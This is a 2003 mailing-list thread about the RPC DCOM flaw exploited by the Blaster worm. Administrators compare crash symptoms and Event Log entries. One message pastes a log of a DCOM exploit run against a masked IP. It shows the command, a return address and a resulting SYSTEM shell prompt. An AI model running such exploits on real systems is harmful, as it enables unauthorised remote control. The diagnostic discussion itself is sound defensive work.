Amazing... This is all it takes. And I'm patched to date. Wonder when they'll fix that! [root@orbital root]# ./dcom 4 xxx.xxx.xxx.xxx (IP munged for security purposes) --------------------------------------------------------- - Remote DCOM RPC Buffer Overflow Exploit - Using return address of 0x77f92a9b - Dropping to System Shell... Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:\WINNT\system32> -----Original Message----- From: Ryan Lambert Sent: Tuesday, August 12, 2003 8:36 AM To: thin@xxxxxxxxxxxxx Subject: [THIN] Re: OT: RPC symptoms That's possible. I was detailing the remote attack without infection from the worm. Installer wasn't involved in my testing. -----Original Message----- From: Adam.Baum@xxxxxxxxxxxxxx [mailto:Adam.Baum@xxxxxxxxxxxxxx] Sent: Tuesday, August 12, 2003 8:29 AM To: thin@xxxxxxxxxxxxx Subject: [THIN] Re: OT: RPC symptoms Yup, got this too. Also found a bunch of failed MSI Installer events. Maybe blaster tried to install, but was only partially successful. adam thin-bounce@freel ists.org To: <thin@xxxxxxxxxxxxx> cc: 08/12/2003 05:27 Subject: [THIN] Re: OT: RPC symptoms AM Please respond to thin Ron, I have noticed three things in particular when running test attacks. You will see on the console that svchost.exe has crashed. It has a corresponding Event Log entry. Event Type: Information Event Source: DrWatson Event Category: None Event ID: 4097 Date: DATE Time: TIME User: N/A Computer: COMPUTERNAME Description: The application, svchost.exe, generated an application error The error occurred on DATE @ TIME. The exception generated was c000001d at address 77E8367A (<nosymbols>) Also this: Event Type: Error Event Source: EventSystem Event Category: Event System Event ID: 4097 Date: DATE Time: TIME User: N/A Computer: COMPUTERNAME Description: The COM+ Event System detected a bad return code during its internal processing. HRESULT was 800706BF from line 42 of .\eventsystemobj.cpp. Please contact Microsoft Product Support Services to report this error. ******************************************************** This Week's Sponsor: RES PowerFuse, The Management Framework for Windows Eliminate Multiple Tools, Multiple Support Channels and Multiple Costs Manage, Control, and Secure an Entire Windows environment with Ease, including Real-time Reporting and Documenting Components Validate a Meaningful ROI on All of your IT Investments with RES PowerFuse. http://www.respowerfuse.com/ ********************************************************** Useful Thin Client Computing Links are available at: http://thethin.net/links.cfm For Archives, to Unsubscribe, Subscribe or set Digest or Vacation mode use the below link: http://thethin.net/citrixlist.cfm ******************************************************** This Week's Sponsor: RES PowerFuse, The Management Framework for Windows Eliminate Multiple Tools, Multiple Support Channels and Multiple Costs Manage, Control, and Secure an Entire Windows environment with Ease, including Real-time Reporting and Documenting Components Validate a Meaningful ROI on All of your IT Investments with RES PowerFuse. http://www.respowerfuse.com/ ********************************************************** Useful Thin Client Computing Links are available at: http://thethin.net/links.cfm For Archives, to Unsubscribe, Subscribe or set Digest or Vacation mode use the below link: http://thethin.net/citrixlist.cfm ******************************************************** This Week's Sponsor: RES PowerFuse, The Management Framework for Windows Eliminate Multiple Tools, Multiple Support Channels and Multiple Costs Manage, Control, and Secure an Entire Windows environment with Ease, including Real-time Reporting and Documenting Components Validate a Meaningful ROI on All of your IT Investments with RES PowerFuse. http://www.respowerfuse.com/ ********************************************************** Useful Thin Client Computing Links are available at: http://thethin.net/links.cfm For Archives, to Unsubscribe, Subscribe or set Digest or Vacation mode use the below link: http://thethin.net/citrixlist.cfm